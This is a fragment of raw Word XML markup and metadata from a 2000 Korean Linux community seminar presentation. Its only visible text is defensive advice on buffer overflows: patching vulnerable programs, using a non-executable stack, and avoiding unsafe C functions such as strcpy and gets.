          <w:ilvl w:val="0"/>
          <w:numId w:val="34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nstall non-executable stack patch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It can be broken with heap overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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Patch the vulnerable programs as soon as possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr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Do not use strcpy(), strcat(), scanf(), sprintf(), gets(), and so on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>They don’t check the boundary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.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.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.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.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.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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
      <w:color w:val="00000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outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
      <w:color w:val="000000"/>
      <w:sz w:val="8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WW8NumSt2z0">
    <w:name w:val="WW8NumSt2z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WW8NumSt40z0">
    <w:name w:val="WW8NumSt40z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WW8NumSt52z0">
    <w:name w:val="WW8NumSt52z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WW8NumSt53z0">
    <w:name w:val="WW8NumSt53z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="48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굴림" w:hAnsi="굴림" w:eastAsia="굴림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ind w:left="200" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="굴림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ech.edu/~ohhara" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ohhara@postech.ed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6:34:00Z</dcterms:created>
  <dc:creator>teguri</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>teguri</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-03-12T19:03:00Z</dcterms:modified>
  <cp:revision>29</cp:revision>
  <dc:subject/>
  <dc:title>제 4회 리눅스 공동체 세미나 B-8 세션</dc:title>
</cp:coreProperties>
</file>